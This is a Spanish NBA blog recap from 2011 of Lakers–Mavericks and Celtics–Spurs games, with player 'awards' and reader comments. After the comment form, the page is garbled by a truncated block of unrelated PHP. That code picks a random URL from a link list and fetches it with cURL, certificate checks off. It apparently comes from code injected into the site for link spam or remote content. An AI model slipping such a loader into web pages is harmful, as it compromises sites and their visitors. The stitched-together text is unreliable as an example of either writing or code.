La Crónica (31/03/2011)

01 de April de 2011 por TheDeerHunter

Los playoffs están aquí. Se huele. Se palpa. Podemos verlo en partidos como los de anoche, calificados simplemente de buenos en otras fechas, pero que ahora alcanzan el calificativo de acojonantes. Nada de bromas.

Algunos habíamos olvidado que Steve Blake seguía vivo hasta verle anoche tratar de pegar a Jason Terry. Terminaron 5 tíos expulsados en un duelo menor comparado con lo que se nos viene encima. Nos gotea ya el colmillo imaginando qué harán entonces. Con ciertas posibilidades de cruzarse en segunda ronda, los Lakers sacaron adelante un crítico partido frente a Dallas. Los hombres de Phil Jackson desplegaron un juego casi perfecto, ajustando las defensas “modo playoffs” conforme fueron pasando los minutos. Sólo Nowitzki y algo Stojakovic pudieron aguantar a ese nivel, aunque también hay que decir que los tejanos venían de matarse para ganar a los Clippers la noche anterior (82-110).

Por su parte los Spurs perdieron ante Boston (107-97). La derrota es lo de menos si puedes recuperar a Duncan. Con el equipo al completo la cosa pinta distinta en postemporada, aunque tampoco pueden dormirse pues sólo tienen dos partidos de colchón. Los Celtics recuperaron también a Jermaine y próximamente volverá Shaq. También es otro color a pesar que anoche se lesionó Krstic. Rondo cuajó el mejor partido desde hace semanas y su equipo lo notó. La victoria les devolvió la 2ª plaza del Este.

PREMIOS

MVP: Reapareció el Rajon Rondo que recordábamos de antes del All Stars. 22 puntos, 14 asistencias y 5 rebotes, claves para otorgar la victoria a los Celtics sobre los Spurs.

Rookie: Nada destacable. Tan solo jugó Gary Neal y no lo hizo precisamente muy bien (9 puntos con un 4 de 12).

Sorpresa: Cuando juegan 4 equipos de tanto nivel y tan experimentados como los que saltaban anoche a la cancha, pocas sorpresas hay. Si hemos de destacar alguna cosa, los 10 puntos, 3 rebotes, 3 asistencias de JJ Barea en 8 minutos de juego.

Decepción: Hasta su expulsión Jason Terry llevaba 5 míseros puntos con un 2 de 9 en tiros de campo. Por ahí se empezaron a escapar las posibilidades de los Mavs de sacar algo del Staples Center.

Esfuerzo en vano: Dirk Nowitzki fue el único jugador de los Mavs que acudió anoche para presentar batalla a los Lakers. Demasiado para el alemán, que acabó el partido con 27 puntos y 13 rebotes.

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. Txusma dice:
    #1

    Cómo va a haber una tangana y Matt Barnes no iba a estar por medio!?

      Citar

  2. KB # 24 dice:
    #2

    u¡Una pregunta que llevo haciendome varios días es, Si en la NBA cada equipo juega 2 veces contra los equipos de la otra conferencia (15×2=30), juega 4 veces contra los de su división (4×4=16), cuantas veces juegan contra los equipos de su conferencia que no son de su división?

    Me quedan 36 partidos a repartir entre 10 equipos, es decir, los spurs han jugado 2 veces en dallas y una contra ellos en SA??? es lo que no me queda claro, alguien me lo puede aclara? se hace mediante sorteo? o me he equivocado con los datos?

      Citar

  3. MagicJohnson32 dice:
    #3

    Como los Lakers se mantengan sanos, qué difícil va a ser a los rivales poder plantarles cara…

    @ KB # 24

    Contra los equipos de su misma conferencia pero otra división se juega 3 ó 4 veces. Hay 4 equipos con los que se juega 3 veces, y cada año van cambiando.

      Citar

  4. KB # 24 dice:
    #4

    @Magic gracias por la aclaración. Pero este sistema no me parece demasiado obetivo deberían revisarlo

      Citar

  5. GreenPride dice:
    #5

    Partidos con ambiente de playoffs ayer.
    Boston pareció recuperar parte de su juego unido por supuesto a la vuelta a su juego de Rondo. Importantísimo el papel del base en los verdes que se mostraron bastante mejor que sus últimos deprimentes partidos y que recuperaron algo de firmeza interior en defensa con unos pocos buenos minutos de Jermaine. Esperemos que la lesión de Krstic sea poca cosa porque su falta en playoffs se notaría dando minutos de descanso a los O’Neal si estos están bien o jugando muchos minutos si estos no lo están. Ray Allen está pasando una mala racha de tiro pero eso no preocupa tanto a los verdes. Por los Spurs también clara mejoría respecto a sus partidos anteriores en la vuelta de Duncan pero les lastraron sus fallos en los triples. Llevan 5 derrotas seguidas y deberían ponerse un poco las pilas si no quieren que su ventaja campo con los Lakers peligre en los últimos partidos.
    En LA los Lakers asustan y mucho. Actualmente son claramente el mejor equipo de la NBA para mí y son los claros favoritos para repetir anillo a día de hoy. Así de claro, el equipo funciona y sus hombres altos son una pesadilla para cualquiera contra el que se enfrenten. ¿Hay alguien que pueda competir con ellos en playoffs? Para mí en el Oeste la respuesta claramente es no. Los Spurs no tienen el poderío interior para ganarles una serie a 7 partidos y los Mavs han perdido la ventaja campo y parecen bastante inferiores a ellos. Si llegan a las Finales para mí sólo los Celtics en buena forma podrían impedir su título o quizás unos Heat o Bulls en estado de gracia aunque lo dudo en estos 2, unos por falta de química y otros por falta de experiencia.
    Por cierto vaya manera de repartir palos de los Mavs una vez que ya tenían el partido perdido

      Citar

  6. Vader dice:
    #6

    A los Lakers a este nivel pocos pueden hacerles danyo… Si acaso una eliminatoria contra los Thunder podria tener algo de color con la nueva rotacion interior de estos.

    Saludos

      Citar

  7. TheDeerHunter dice:
    #7

    Efectivamente para mí los Thunder son el equipo anti-Lakers perfecto. El año pasado ya fue una pesadilla ese enfrentamiento. Algunos lo interpretaron como debilidad de los amarillos pero el mérito fue todo de ellos.

      Citar

  8. Cocinitas dice:
    #8

    A mi me huele a three-peat vaya nivel al que estan con la de palos que se han llevado.

      Citar

  9. Sempren dice:
    #9

    Es el tema xD. Y yo creo que aún volverán a recibir más palos, cuando se relajen con algún 2-0 en la eliminatoria, que ya sabemos como son los angelinos xD.

      Citar

  10. Denise dice:
    #10

    Los Lakers se están paseando desde el All-Star. Siempre he dicho que son la mejor plantilla, y su maximo rival no son los Heat ni los Celtics ni los Spurs, sino la implicación y la actitud de ellos mismos. En el momento en que se han puesto las pilas, y jugadores como Artest parecen involucrados en el proyecto mas que nunca, barren al resto. Con esta actitud, Kobe tirando lo que debe, y el trio interior asolando la pintura, no hay quien pueda con ellos.
    Volvió Ratliff tras mucho tiempo.
    Matt Barnes crack !. Que aburrido sería esto sin juego sucio y broncas.

    Y Popovych vuelve a lo de siempre, dandole una minutada al jurasico McDyess (que bastante hace el hombre) e ignorando a Splitter. Y los Spurs, desinflandose en el peor momento de la temporada.

    PD: En mi opinión, el factor cancha es una de las mayores falacias del basket, y en la Euroleague de este año se está demostrando. En una eliminatoria siempre gana el que está en mejor momento de forma o es mejor, da igual, si tiene factor cancha o no. Cuando un equipo es mejor que otro le gana donde haga falta.

      Citar

  11. KB # 24 dice:
    #11

    @ Denise, sobre el factor campo tienes toda la razón, gana el que mejor está.

    Pero los dos sabemos que el año pasado los lakers ganaron el septimo partido gracias a no jugarlo en Boston (lo digo así porque jugar en el Staples tampoco es como el campo del Panatinaikos ayer xD)

      Citar

  12. Denise dice:
    #12

    Eso nunca se podrá saber si los Lakers hubieran podido ganar en Boston.
    De todas formas, siempre digo que el factor cancha sólo ayuda algo (y sobre todo porque los arbitros se cagan) en un séptimo partido (o quinto en caso de Europa). En los demás, es una falacia.
    Creeis que un jugador profesional curtido en mil batallas, y en concreto las estrellas de los equipos que al fin y al cabo son los que deciden, se acojonan porque la gente les esté puteando desde las gradas y pegando voces??
    Anda que no habrán pasado por cosas peores en sus vidas, como para acojonarse porque un montón de gente les silbe y les insulten, situación a la que están acostumbrados desde que juegan a esto.

      Citar

  13. Txusma dice:
    #13

    Pues yo a los jugadores del Barça les vi anoche absolutamente acojonados…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>